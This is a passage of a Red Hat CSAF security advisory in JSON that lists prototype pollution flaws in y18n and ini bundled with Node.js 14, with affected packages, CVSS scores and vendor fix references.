"https://www.cve.org/CVERecord?id=CVE-2020-7774" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7774", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7774" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-Y18N-1021887", "url": "https://snyk.io/vuln/SNYK-JS-Y18N-1021887" } ], "release_date": "2020-10-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:28:03+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0551" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-y18n: prototype pollution vulnerability" }, { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:28:03+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0551" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-8265", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912854" } ], 